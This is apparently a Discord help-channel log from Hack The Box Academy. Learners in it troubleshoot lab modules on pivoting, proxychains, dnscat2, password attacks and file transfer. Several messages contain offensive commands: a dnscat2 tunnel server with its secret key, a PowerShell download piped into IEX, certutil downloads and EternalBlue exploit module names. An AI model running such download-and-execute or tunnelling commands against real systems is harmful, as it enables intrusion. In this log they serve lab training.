#modules

but not from the attack host

Thats crazy im trying stuff for an hour now to connect to it but it doesn't want to connect

try for the first pivot

from*

The webserver?

nono from the server u found the user:pass

for me it was working

ahem spoilers: dm

what?

Aight ill try to reset I think since it doesn't work for me then

Thanks tony

@zenith acorn keep to the topic

sorry thought this was general'

of course you did

No, this is Patrick

No worries but yea I had to restart the lab a few time for it to work

now im training an rrn on the maestro data set for 100 times

Lets not antagonize each other

never seem to get it rght

need transformers

Still not #general

haha

Lay off the stuff man

okay

fwiw, ligolo-ng made this SA stupidly easier for me. Even though, I had some troubleshooting to do at the beginning related to the tool, once I switched back to an older version, I finished the whole lab in 30 minutes I think.

Ok nice I see I'll try doing the whole lab again using only ligolo-ng to compare it

I recommend using an older version; I used v0.5.2. If you get stuck with the tool, you can DM me

thanks for the help and got it will use v0.5.2

check the reading for "source ports"

you're overthinking the problem

netcat also requires a source port

the reading is clear

also you're using way too many flags there in your nmap command LOL

-A would be a nice shorthand for that many flags methinks

I appreciate it! I did already try that one on this task

again you're overcomplicating it

you only need to stick with what's shown by the module

(ncat is nmap's netcat module, you can install with sudo apt install ncat)

I really appriciate your help, marcielee. was stuck on that for too long.

stop spoiling commands

Okay, sorry. wasn't sure if blacking it out was okay

spoiler tags don't really do much as anyone can click them

should I also reframe from posting commands in my original help message further up?

is there a list of rules for this channel? I checked in main rules but don't see anything specific. Just see the headline here not to spoil content over tier 0.

if it's something you had to discover or figure out, it's a spoiler
pretty much anything done on skill assessments are spoilers

Okay, thank you and understood.

this Thick Client Attack module is missing lots of things to be considered close to 'ok'. Compiling process is confusing and codes that needs to be changed it's not well identified. At the end is also missing a note to inform that it's needed to delete the same method present. It's a huge waste of time

Hey Guys for the SMB in footprinting module, I am trying to get the version(which I do) but it's not accepting the answer

this is the command to enumerate the SMB version

nmap <IP address> -sV -sC -A -p139,445

What version does nmap tell you so I can tell you if it is correct?

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4

Have you tried manually enumerating?

Try to use all the tools explained in the module, each one will give you different and maybe more detailed information!

Only nmap with different flags but no access

I'll try that for sure

appreciate it guys I'll update you on it

I want to start tackling htb labs. What courses should I take on the academy before I start?

the cpts path would probably be best, but the academy paths are really designed to give you the knowledge and tools to take on the corresponding exams. it can certainly help you attack the lab machines, but the labs have a lot of variety and some things you just won't see in the paths.

I don't exactly have too much money for that, if I am not mistaken the cpts path is a lot of money lol.

hey guys can i ask here whether does the silver subscription open each module from 0 to 4 tiers?

any community member on rn?

I need to talk to an admin or something, to report a bug i found in the machines

#1234357888114364508

it allows me to connect to another users session on a completely different box

In the "Password Spraying - Making a Target User List" section, it says:

"We've checked over 48,000 usernames in just over 12 seconds and discovered 50+ valid ones."

Is this a typo? Because I'm doing the exercise against the same target with the same userlist, and it has been 20 minutes and going.

That seems logical. As otherwise you’d have to get a new vpn file for each box you spawn

But you should only connect to the IP given to you

How to buy ai red teaming course?

the privesc on "broker" gave me root for "bashed", someone elses box

I have no idea how that’s possible. Might want to contact support about it

What course are you referring to?

https://academy.hackthebox.com/path/preview/ai-red-teamer

The path is new and has only 2 tier 0 modules so far. These modules are free, so go ahead 😅

DM me a screen recording. Run whoami and hostname

can i just share my screen and show you, im still on it rn

Show @low girder 😄

whoops, wrong reply

Can I call you now on the Discord?

yeahh

With cubes

How many cubes required

10 cubes for each module at the moment

i am finding trouble answering the Suricata questions in the 'working with IDS & IPS' Module ... " In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?" although the rule shows that the offset is 9 but it's incorrect, i tried to activate the rule and the check the fast.log file but nothing there.

You need to keep trying different offsets

is there a range of offsets?

NVM i figure it out

Introduction to NoSQL Injection Skills Assessment II

Any here who can provide a hint on this one?

I can confirm that it's ||Server-Side JavaScript Injection|| but my payload doesn't seems to be working 😦

I just completed it... APPLICATIONS OF AI IN INFOSEC

Already finished, but thanks for the reply

@fickle thicket

I tried Blind Data Extraction with Server-Side Javascript Injection but it doesn't seems to work too

What’s ur payload

Why are you looking for a username?

Do you not have a valid one yet?

Can i DM you?

Please keep the spoilers to a minimum and take it to dm 🙂

hi everybody module/211/section/2255 i need the some help to solve it
I don`t understand which type of filter needed

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Browse the refined visualization we created or the "Failed logon attempts [All users]" visualization, if it is available, and enter the number of logins for the sql-svc1 account as your answer.

In Attacking Common Applications, section Attacking CGI applications - Shellshock: any idea why the curl call to verify the vulnerability includes bash -s :'' ? After researching I know what it does (or can do), but it doesn't really seem to do anything here

even after a full restart of the machine, all of the options get configured, and when ran I get:

" Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created."

What am I missing? lol please @ with response

Hi, I am doing Windows PrivEsc module, SeImpersonate section, I am trying ot use msssqlclient from impacket to log in as sql_dev, but the output I have is:
||```bash
┌──(venator17㉿venator)-[~/Downloads]
└─$ impacket-mssqlclient slq_dev:'Str0ng_P@ssw0rd!'@13.13.13.13 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[-] ERROR(WINLPE-SRV01\SQLEXPRESS01): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.

I don't know if this is the issue or not, but you're signing in as slq not sql

besides what r0GLITCH said maybe you need to use without -windows-auth if this account is not from the domain

Username

slq_dev should be sql_dev

Oh yeah Isee

<@&861185840277487616>

this is not hack for hire and the hacker you're hiring is probably scamming you

NO, this is not hacker for hire, and this is illegal

https://tenor.com/view/taehyungmaraj-taehyungminaj-taeminaj-stfu-gif-21986141

I am trying to use proxychain to proxy curl commands through Burp. I am doing this as part of the Using Web Proxies module. It doesn't seem to proxy my requests though.

I've modified the proxychains configuration file as directed (/home/user/.proxychains/proxychains.conf) with the line http 127.0.0.1 8080. The request goes through, but it is not being proxied through Burp. Yes, Burp is set up to intercept port 8080. Anyone run into this issue before?

Here is the attempt and response:

usr@nixos:~/ > proxychains4 curl http://google.com    
[proxychains] config file found: /home/usr/.proxychains/proxychains.conf
[proxychains] preloading /nix/store/3rm2axf2sdjx4fnlwxpr3cm2hvhrhrh3-proxychains-4.4.0/lib/libproxychains4.so
[proxychains] DLL init
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>

Hi, I am doing the Privileged Access Module in the active directory section

Kind of having issues understand the raw queries for BH

also is writing queries for BH that common ?

BH = Bloodhound !

does your conf look any different from mine? seems to work on my box

Yeah it does look different, I don't have the [ProxyList] line, I'll try that now, thanks

cp /etc/proxychains.conf ~/.proxychains/proxychains.conf

if you want to take the preinstalled conf file and make your own conf out of it

It didn't work unfortunately. I don't seem to have the file /etc/proxychains.conf. I am using nixos, maybe it doesn't add that file

http_proxy=localhost:8080 htts_proxy=localhost:8080 curl https://google.com worked, so I think it is a proxychains configuration issue. I'll keep poking around

I've found the proxychains configuration file (https://github.com/haad/proxychains/blob/master/dist/proxychains.conf), copied it over, and added the localhost line. This also did not work.

I've been meaning to try Arch, maybe I'll switch over

do you have socks4 or socks5 set in your /etc/proxychains.conf ? if you have socks4, try with socks5 and the other way around too

frankly tried+true is parrotOS and kali

but obviously trust your preferences

I do have a socks4 line in the proxychains.conf but it is commented out as per the instructions

I'll try uncommenting to see if it changes things

FWIW in my screenshot above the original could not connect error was with socks4 specified - the vim command after it was me changing socks4 to http

why? Not sure! there's probably a good reason

with chisel for example you need socks5 as that is what it does by default, with burp idk is it socks4 or socks5 proxy ?

No, that didn't work. Here is my current config:

strict_chain
#proxy_dns
#remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000

localnet 127.0.0.1/255.0.0.0

[ProxyList]
#http 162.243.184.252 8585
http 127.0.0.1 8080
#socks4 184.170.245.148 4145
#raw 162.243.184.252 8585

I'll try socks5 next

well worth a shot

No that also did not work. The request goes through but doesn't proxy through Burp like all the others

Google is not very helpful in this regard lol

the only lines I have uncommented in my conf file are below:

strict_chain
tcp_read_time_out 15000
tcp_connect_time_out 8000
proxy_dns

[ProxyList]
socks5  127.0.0.1 8080

does it only impact curl or other tools too ?

prob change socks5 -> http

Oh, ok I'll try that

I'm so confused. I'm doing this question: Determine what user the ProFTPd server is running under. Submit the username as the answer.

I did:

input: sudo ps aux | grep proftbd

output: ||htb-ac-+ 197419 0.0 0.0 6332 2304 pts/0 S+ 09:12 0:00 grep --color=auto proftbd||

How is ||htb-ac-+|| not the correct answer?

Read your input back carefully Valle

the output is also a clue :)

No, that didn't work either

Stupid comment, but did you restart the service?

I am not sure, I'll try some other tool to see, it'll take me a minute to figure this out since this is my first time using proxychains though.

can you try to use it with curl's native proxy option ?

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:21]$ curl --help all | grep -ie 'proxy'
     --haproxy-clientip <ip>                       Set address in HAProxy PROXY
     --haproxy-protocol                            Send HAProxy PROXY protocol v1 header
     --noproxy <no-proxy-list>                     List of hosts which do not use proxy
     --preproxy [protocol://]host[:port]           Use this proxy first
 -x, --proxy [protocol://]host[:port]              Use this proxy

Ew root shell

like setting it with -x, instead of using proxychains

No, I didn't. How would one go about doing that?

😅

Hell Na

‘Mm

Yes that works

Ah, cool.

ah ok, well at least we know it's isolated to something with proxychains

and not the burp proxy itself

I changed the input: sudo ps aux | grep proftpd

I thought usernames would be on the first column? Am i missing something?

Oh nvm, proxychains

No service to restart in that use case

Ah, ok cool. Yeah systemctl wasn't finding it so I was going to google, thanks for updating.

i abuse my kali installation and nuke it frequently + restore from snapshot
anything i actually need is stored my host os 🤓

gave up on trying to make it stable

https://tenor.com/view/book-of-boba-fett-the-mandalorian-this-is-the-way-the-book-of-boba-fett-mandalorian-gif-24825263

what's the new output ?

output: ||htb-ac-+ 211247 0.0 0.0 6332 2048 pts/0 S+ 09:22 0:00 grep --color=auto proftpd||

username hasn't changed ):

Idk why people have so much issues with their kali

I guess this is Linux Fundamentals ? I don't have that module to test. But if you look at the end of the output, you'll see it's reporting the grep process itself, not the one you're looking for. Maybe grep for something less specific, or make sure you're on the right target

I just tested it on my machine and it works
my config

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:27]$ cat /etc/proxychains4.conf| grep -v '#'
strict_chain
Quiet mode (no output from library)
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http 127.0.0.1 8080

my command

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:27]$ proxychains curl -i http://example.com
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  example.com:80  ...  OK
HTTP/1.1 200 OK

and I see it in burp

dude, no clue. maybe its how it interacts with different vm software but i have encountered a litany of issues. most recently if I try to open burp + firefox too fast it will literally lock up and reboot itself
my most recent nuke of my installation some env variables / window manager configs / ???? got jumbled and i could no longer switch between workspaces or resize windows

WTH lol

literal black magic sorcery

How do u upgrade your stuff?

and instead of spending 500 years debugging the issue i just figure
lets just preload all the tools i usually use
make a snapshot
restore when things inevitably go haywire

which virtualisation soft ?

i use vmware workstation prof

same, huh

Thanks for trying, didn't work, same issue as before.

vmware lets me snapshot so i just have an old snapshot and periodically apt update && apt upgrade and re-save a new snapshot every now and then when it gets too outdated

I give up everyone, I'm just going to switch my OS to something else, I'm tired of dealing with nixos issues and it seems that proxychains works for everyone else. Maybe kali, but more likely Manjaro or just go full Arch

plz god dont use manjaro for pentesting

Oh really

Why not?

its not a pentest os

Use full-upgrade instead of upgrade

unless you really know what you're doing just use the standard OSes everyone uses no need to reinvent the wheel

unless you have a very specific reason for using arch and downloading black arch mirrors for packages you're just asking for more issues than you bargained for

there's a reason theres like 2-3 oses everyone uses for pentesting - it just works (TM)

Lol, ok cool. Yeah I'll seriously consider Parrot and Linux in that case, thanks for the advice

*Kali

guys whats the best vm?

The one you’re most comfortable with

hello, can anyone give a help in Footprinting lab -easy?

Ask your question

I don’t have a question

Ask

just ask

hi

sorry for my english,

i have a question.

i'm traying resolve this module; Attacking common applications - skills assessment I, but i found the vuln at tomcat cgi more specifig in 9.0.0.M1, i also found the exploit at github but this is not working
CVE-2019-0232.py

you're on the right track. why isn't it working?

I suggest taking to dms

So as to not spoil

Good idea, my DMs are open

Who can give me notes or a site or a video,which explains in depth deseralization gadget chains ?

thanks, i don't know, this is a screenshot

sorry i can't

You need to link your account via #welcome instructions

But as I said

i sent you a DM too, you can send me a screen shot privately

spoilers

So take to dms

thanks so much

Has anyone done the Footprinting Medium lab? I'm getting an error when trying to connect to the database, as it looks like the database isn't availble

You can't connect externally

Yeah, sorry.. I've connected via RDP, and I have the SA creds but i get a "no process on teh end of the pipe" when trying to connect

Maybe the creds are reused

😉

I suggest restarting the lab if you're 100% sure

ah... the penny drops! Thanks for the hint... connected now!

in The windows privilege escalation module the Hyper-V administrators section isn't making sense to me. Anyone willing to break it down for me, and help me understand better? My attempts to google it more and using AI didnt help

You make a vm and by default have full control over the vhdx file. you can hard link the vhdx file to whatever file you want then delete the vm, which then the vmms.exe will try to reset the full access permissions of the vhdx file that’s also hard linked to another file

That’s what I understand yeah from module at least

If you have full control of the VHDX file, why wouldn’t you mount it locally and extract all the contents of the ntds.dit file? What’s the point of hard linking the vhdk file to another file we want to control?

thats only if there was already a vm of the DC

Gotcha

Ty

I have some trouble with this module's answer, Introduction to Malware Analysis

Dynamic Analysis
Use Noriben to perform dynamic analysis on shell.exe. Enter the IP address shell.exe pings as your answer.

think i just checked sysmon or tcpview

Did you use noriben to dynamically analyze shell.exe

yes I did use Noriben

I dont see where is the ping

I will checked with tcpview

I've been really struggling with dns tunneling with dnscat2 on the pivoting, tunneling, and port forward module. I keep on running into a powershell error saying that the server failed to negotiate encryption. this should be a really simple module, theres not many commands to enter. could anyone help please?

https://academy.hackthebox.com/module/290/section/3251
can someone explain the tree ? why only rainy on the root as feature ? the explanation below say it should have three branches also for sunny and overcast ,why the explanation doesnt fit the tree?

I tried on the pwnbox too and I get the same issue, in theory all I should have to do is change the ip address for the commands and change the preshared key but I did that and it's not working

i also tried running powershell as admin and that did nothing

should i run it with or without systemd-resolved?

is strace the procmon of linux?

wait where does it show you how many people earned it?

Go to your badge, click the get shared link, use that link and you can see it

Are you copying the secret key correctly?

yes, for sure. Im switching vpn servers now and retrying again

I retrieved the flag from DNS Tunneling with Dnscat2. However I don't know how to get the Domain inlanefreight.local. Where does inlanefreight.local. come from? How can we get it from the command line?

I have zero idea, we might be able to write anything there and it will connect over it? not to sure

i keep on getting this error tho:

ensure your dnscat2 server is set up correctly

it should be, i started it with: sudo ruby dnscat2.rb --dns host=10.10.15.182,port=53,domain=inlanefreight.local --no-cache
and the secret is ba11be266538acf32465c976e4dc9c3e

then your client should be able to reach that port, you can use test-connection to confirm

whats super weird is that i get the same error if i run it pointing to an ip that isnt even mine, even though ping resolves just fine

Restart you kali, erase the vpn files and download it again. Start from scratch..

test-netconnecton ip -port

thanks guys running it rn but the vpn dropped my connection and need to rdp again

systemd-resolve could also prevent dnscat from binding

i had systemd-resolved disabled before and it still didn't work

i have it enabled now

im so confused

sorry test connection defaults to udp iirc

and dnscat uses udp

so just verify its listening on the server

or force a udp test from the client

By any chance does anyone know where the domain inlanefreight.local come from in the DNS Tunneling with Dnscat2 module? How can we retrieve it from the command line?

how would i verify that? like this?

I genuinely don't recall using dnscat2. But it's been a hot minute

i might just skip it at this point, ive been at it for 3 hours now

I'm not to sure where I would really need it anyways, if i can already talk to the host why would i set up dnscat2?

https://tenor.com/view/if-you-think-of-an-gif-20132469

Also: I'm pretty sure the preshared secret bit is for passwords, not a fingerprint as that appears to be

well yes its for pivoting, but i really don't see the point if you already need full admin access to a computer to setup the tunnel. apart from secure data stealing, idk maybe im just missing something

but at that point an upload server is better

with a cert

Hi guys, I have a little interpretation problem that I need some guidance on. Within the Getting started module is the escalation section, and within that is the SSH keygen. although I somehow got it there and done but I wanted to deepen this knowledge so now within metasploitable I should do the same, I already have the RSA_id, I have an authorized_key, and a DSA_key. I just copied them out (CTRL+SHIFT+C) and saved them on my computer in nano. I thought maybe the problem is that I don't have a .pub file. Could this be the error? Chmod of course I have it. maybe this keygen -f would be the solution, could someone understand this with me, here or privately. P.S.: An enthusiastic beginner

it looks fine to me

this is strange

im running from fedora instead of a kali vm, but that shouldnt matter at all

i mean i've been able to get this far so far just fine like this

wait actually i think that may be it and im just really stupid sometimes

i think my firewall may have been stopping this from working

just did this hopefully it gets it to work now

Localadmin != domain admin

😄

awesome

Honestly I switched to ligolo-ng after this module, and never looked back

and this lets you be domain admin with this pivot?

No

oh

It allows you to explore other machines where there may be stored credentials to further elevate privileges beyond a local admin.
A powerful acl is ForcePasswordChange, because that doesn't require you to know the subject's password, just create a new password object and pass that with cred to change password

but if you already need to have full access to the machine your establishing a connection with, why does it matter to setup another route of full access? can't you already setup a socks server from this machine with these rights and do more?

didnt work :/

its not even working on my local machine

It's just a different method of pivoting

Thats all

gotcha ill probably skip it if i can't figure it out in another hour

yeah im so confused

i ran it like this on my local ip: sudo ruby dnscat2.rb --dns host=192.168.50.110,port=53,domain=inlanefreight.local --no-cache

then i ssh'd to another computer and ran this to try to see if i could see if its up and working:``` msiubuntu@msiubuntu:~$ nmap -p 53 192.168.50.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 15:45 PST
Nmap scan report for 192.168.50.110
Host is up (0.0038s latency).

PORT STATE SERVICE
53/tcp closed domain

Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds```

but if im on my own pc and i run this to see if theres open ports it says theyre open : sudo ss -tuln | grep ':53' udp UNCONN 0 0 192.168.50.110:53 0.0.0.0:*

You can use any pivoting method on the machines btw

wait no that was really dumb

ok it says its open when i run a udp scan

ok good i just wanna learn more yk

Also wrap code/output in ``` before and after

ok will do mb

```
Like this
```

Looks like this

Formats it in a neater way and makes line breaks easier to notice

Alongside monospaced font

And you can't mistake an O for an 0, O 0

this lab is so frusterating to me now, i can connect just fine with my other machine locally with ```./dnscat --dns server=192.168.50.110,domain=inlanefreight.local

and that creates a shell just fine

i just can't do it with the powershell command

I smell a bot

im on the module right now, i think it has pretty clear commands. i also went to medium and found and article there using the exact same commands im using and i couldn't get it to work following thos, thanks tho.

thank you i finaly got it to work though!

no idea what i changed

That article contains the flag btw, I recommend removing it from the message

yeah but you dont even need to tunnel to get the flag, still removed it

i think i just needed to enable tcp over port 53 on my firewall and then reboot my computer

Also. Pivoting is a t2 module as well, so any articles or videos are against htb ToS

oh huh i didn't know that

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

are the medium modules tier 2?

Not all, and not all fundamental modules are tier 0

https://academy.hackthebox.com/module/details/158

The cost is one indicator
https://help.hackthebox.com/en/articles/5272936-introduction-to-htb-academy

Price: 10, 50, 100, 500, 1000
Tier: 0, 1, 2, 3, 4

ohh ok gotcha

@lusty thicket @frigid bay thanks for the help again!

u were right his message got delted

whats the point of botting to offer help?

Token stealing, most likely, my bet is that they link to some discord server titled "support" which asks for a third-party authentication, which sends token and login info

interesting, this is kinda a bold place to run discord scams

is there anything you guys do to stop the vpn from dropping your connection every 5 minutes or so?

Are you running the pwnbox at the same time?

oh yeah its on but i'm not using it

just terminated hopefully ssh connections will stop dropping

That's why, pwnbox uses the same VPN and shares the IP. use one or the other.

alright thanks!

somehow im 41% of the way through the course and still missing things like this lol

but hey at least i can type HTB_@cademy_stdnt! really fast now

just copy/paste

¯_(ツ)_/¯

no need to type it if you copy/paste it

nooo but i want to save my clipboard for longer messages

.

windows has win+v for advanced clipboard actions; allowing you to have many things on your clipboard

fedora does that too lol i probably should just copy and paste its prob quicker

I still mistype stdnt about 50% of the time for that password...

my first time getting this msg trying to spawn a pwnbox

I was just gonna use the HTB version of ParrotOS in a VM but it wouldn't boot if I enabled LUKS encryption, and the package manager seemed to have misconfiguration issues by default where I couldn't update it until I changed the entries for its source list, but then it still had some public key issue so I just went back to using the pwnbox.

maybe ill try again with normal parrotOS instead of following the "setting up" module

i'm pretty sure the only difference is the theme

I figured it would have different tools installed by default

i don't think so (i could be wrong)

Hey there, I have come back to HTB to continue the nibbles - privilege escalation module, do I have to redo the older nibbles modules like initial foothold before I continue? The reason is my labs are not working as expected.

each module and section are standalone instances, you don't need to do previous sections to access/complete later sections

sometimes modules will use the same target for several sections, i forget but for those you may need to perform the previous steps to gain privileges back that you may have obtained on a previous section

Thanks for the quick reply SuperNuts

change pwnbox region

Ok looks like i will have to redo …going by the commentary in the module …thanks.

Not really

You can get access directly from your dashboard mate!
@light breach

Yeah the nibbles sections are all interconnected as it's a walkthrough of the retired machine nibbles https://app.hackthebox.com/machines/121

The module starts off with “ Now that we have reverse shell…”

Yeah I don't think they know wtf they're talking about

I reckon there should be some persistence in state so we don’t have to redo the modules again …especially for time poor students like us who manage work, family and study 🫤

Okay

You should be able to get access from your dashboard menu mate!

Nope, since the instances are killed after some time and spawned when you click "spawn target" persistence isn't really possible

What dashboard you nonce

https://tenor.com/view/change-of-plans-left4dead-nick-gif-26287602

👍

linux fundamentals, regex expressions. I am supposed to be grepping for Authentication as the end of the line, what am I missing in my command? I have looked and can't find anything online.

Maybe I did it right after reading the line again.

I tend to overthink sometimes

Nope it's looking for words that end with Authentication so PasswordAuthentication, but not just Authentication so no space in front

ok, thank you

Hi

@fathom pendant I can finally say I've done the fundamentals! not before getting ProHacker rank though
https://academy.hackthebox.com/achievement/1306612/path/120

I'm going through the Pen tester module and I've reached the Nmap section. I'm told in the exercise to use the IP address 10.129.42.253 to run nmap with, but the host seems to be down. It keeps saying destination host unreachable when I try to ping it. Is this a known issue?

Are you connected to the vpn? The ip in the example commands isn't the target that you'd scan

The ip you'd scan is the one given when you <click here to spawn target>

I am connected to the VPN and I just found the spawn target button.....

Thanks for the help, it should work now

Sorry, new to HTB

I'm going through the AD Attacks module, Kerberoasting from Windows section. I extracted tickets from the memory using mimikatz and they're saved as .kirbi files. I'm wondering, is it possible to transfer them, convert to .ccache and do PTT attack?

impacket ticketconverter

Yeah, I'm aware. But using the .ccache to authenticate didn't work. Also, I feel like I'm missing something here, because it doesn't make sense to do PTT via Kerberoasting.

it's described in the PTT from Linux section of Password Attacks

Oh, I'm supposed to have TGT, not TGS for PTT, I think.

hello

I have a question. How can I tell if bloodhound and SharpHound are collecting the same version?

Honestly, I recommend using the Community Edition.

How do you pivot with Dnscat2?

exactly.
There were several times that I got stuck on a machine, went to see walkthroughs, and found that they have info that I did not see in bloodhound, using CE solved this.

though I miss legacy because it had ready to use queries lol.

I didn’t even know certificate vulnerabilities were included in the CE. Usually it was, work through BH, no more paths? Go run certipy for vulns

I found this at pwn.

You need to go to the Bloodhound CE Github page. There are instructions for running the CE version through Docker

Either use this or bloodhound-python for that version https://github.com/BloodHoundAD/SharpHound/releases/tag/v1.1.1

ok thanks guys, I'm about to try it now!

In the legacy bloodhound UI you can click the i icon to bring up the version

additionally, running SharpHound also tells you with which version of bloodhound is compatible

can i get a hint Examine the second target and submit the contents of flag.txt in /root/ as the answer. its from password attacks practise lab medium . i found the document containing password of a user then found mysql instance and found more creds of another user i dont find any file containing root creds

???

? What are you inquiring about?

doing lab and stuck

module = password attacks . section practise lab medium

have you checked ssh?

yeah i switched to the user dennis and found his private key

but i need root

just because its in there doesnt mean its his

yeah i checked i cannot ssh into root with that private key

why not?

root@10.129.202.221: Permission denied (publickey).

ok?

it wants a private key

yeah i public are not encrypted

it was encrypted

then get the keys password

so just think its private key and pubilc key have .pub in ext

wym?

dm your commands

Why are you grabbing the .pub file?

id_rsa is the private key

i did grab the private key

the problem is the private key is encrypted and even using that key there is no pasphrase prompt to unlock that key and use it .

It's not encrypted the word you're looking for is password protected

And there is a tool to extract the password hash, John is a friend here maybe you should look 2 him

i think htb used the word encrypted in the module

any way

??

Just putting it more into a colloquial perspective

Then it seems like the rsa key you have isn't the right one for root

If pubkey auth fails, it tries to fall back to pw auth

And if that's disabled then you get the message you're getting

Yeah then i just aimlessly finding the creds for root and its been 2 hours

I found overlayroot which contain the password foobar

regret paying for the ejpt, htb acadamy is way better

But its out of module so i think it is not the way

Agree

and the exam was a joke

very easy

I found a distraction

Yeah

A user you have access to has the key

Fr just go for one of the beginning tcm certs

Ine course is unnecessarily long with barely any web and no AD

Btw did u deleted my ss @fathom pendant after this one

Password attacks is above tier 0

ohh i forgot sorry for that

||ms17_010|| exploit keeps failing for shells and payloads skill assessment?

Specifically using ||exploit(windows/smb/ms17_010_eternalblue)|| was going to try and just get a .py script to run instead but firefox wasn't getting anything on the internet and would time out

yeah I'm lost on this, I've reset a couple of times too

anyone got any help for this? please @ with response

^^^ Using ||psexec|| over the other one I mentioned works better disregard help

Hi guys, im working with bloodhound and i have to finde the name of a computer, but instead bloodhound give me the id obtject of it, i have to run again sharphound? or i missing somesing

you can run a query

With Get-ObjectAcl?

Im kind of new in powershell/powerview queryes

cypher queries

message me if you can’t figure it out

but research first

been thining about doing tcm, but htb acadamy might be better?

it worked but this time i tried to encode decode the key to transfer it and then use it . and it worked that way but earlier i also did checked the md5 hash of both of the key . they are same so come this happend

I'll check it ty

@fathom pendant ??

Regarding PetitPotam, is it possible to perform an attack without ADCS service?

The Injection Attack Skills Assessment was difficult, but the overall module was amazing

if anyone would like to talk about it (even in dm) i would appreciate 😄

In the RBCD from linux module, in the RBCD from Linux When MachineAccountQuota Is Set to 0 section. I understand why the password change is necessary but, should't we also require the user's SID to be added to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute? I didn't really understand why we are able to impersonate the Administrator when we are not actively modifying this attribute... Can anyone explain please?

I am new to HTB Academy (and Cybersecurity), should I start with the CBBH path or is there a beginner module that I should do?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks!

Are you trying to do Web pen testing or Network Pen testing?

CBBH is more web testing, CPTS is more network testing but has web app testing included

Hello guys i'm trying to download a file from powershell i tried a few command but still get the same error message

Invoke-WebRequest : The server committed a protocol violation. Section=ResponseStatusLine
At line:1 char:1

• Invoke-WebRequest http://10.X.X.X:80/Downloads/0.pcap | IEX

•   + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
   eption
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Hello

I don't know

CBBH is the first path so maybe I'll just stick to that first

no, lol

sounds like a issue with how the web server is responding to the request

http://academy.hackthebox.com/module/15/section/453
HOW DO I OPEN THE ROOM AND DETERMINE A İP ?

try to use -UseBasicParsing

Invoke-WebRequest -Uri "http://10.X.X.X:80/Downloads/0.pcap" -UseBasicParsing -OutFile "0.pcap"

Try Invoke-WebRequest "http://10.x.x.x/Downloads/0.pcap" -OutFile .\0.pcap

Your caps lock seems to be stuck. 😉

thanks

How do I turn off the machine when I'm done?

you will see it

just wait for it to spin up

@bright ridge

I answered the question, I want to turn off the machine

You can't turn them off. It's automatic.

It turns off automatically, no problem anyway

😄

okey

oh its the intro to acdamy

my bad

I was working on the x platform, I moved here because it was better here, I am trying to discover the new site.

hello guys, how are you here, just curious i would like to ask some questions concerning cybersecurity

Hello, I have a question about DRM, where can I ask it?

how do you it or what is the roadmap?

I recommend reading and following #welcome so you can ask in #general

Hi can someone tell me about this module and if it's worth unlocking?

Hi, I am quite at the beginning of my journey - moving through the "Nibbles" walkthrough (Module 77: Nibbles - Initial Foothold)
I am able to scan/ping the target visit the website behind port 80, but gobuster is not able to connect and when I insert my admin credentials on the admin page (which are supposed to work), i do not get an answer (neither success nor failure - just endless sweeping). I've also restarted the target. Any ideas?

No

It's part of the getting started module goober

🤦

why are you using iex on a pcap file?

Actually, it’s not?

https://app.hackthebox.com/machines/121

Oh wait

It is

I suggest resetting the target

🤯

Literally several sections in the getting started module

You’re right

didn't work still have the same issue i guess it is server related. I used python3 -m http.server in my kali linux. and trying to download a file from kali to window with powershell. Just trying a few method to learn

is that download directory actually there?

have you opened the server to see what it looks like

Check the directory first , do ping of the target ip

Yes

i meant open it in a browser

is it the same?

Yes

If its work do urlcache or wget

already tried that - i guess I'll give it tomorrow another shot - thank you 🙂

yes i can open it in a browser well in ie browser but the fille is like an link et and in firefox it's all http like missing <http></http>

missing http?

try urlcache too

what is urlcache ?

certutil -urlcache -f http://10.10.15.97/0.pcap 0.pcap

Do this

blocked by AV

i'm not admin on the host

im in the file transfer module

with the host ms02

taps the sign

File upload attacks is not t0

Hello, at the moment I am in the module Windows Attacks & Defences Overview and Lab Environment, as part of the SOC ANALYST path, and now I don't know how to connect RDP with virtual WINDOWS in order to share a file for analysys.
Can you refer to me a link or give an advice

This is so true. Also, sometimes I find a flag and submit and it says "incorrect answer". If I reset the target and pwn box and try the same flag it accepts it.

Like put the file on the windows machine?

Just copy and paste if that’s the case

yes

t0?

Read the channel topic

ohh my mistake

know where I can ask for help? I did check out writeups but I want to know why my specific extension isn't working

most likely because of the / in the extension

Writeups are against ToS for modules above t0 https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

understood

You can ask for help here, just avoid giving specifics, like payloads, or screenshots

You shouldn't need to go beyond what the section shows you

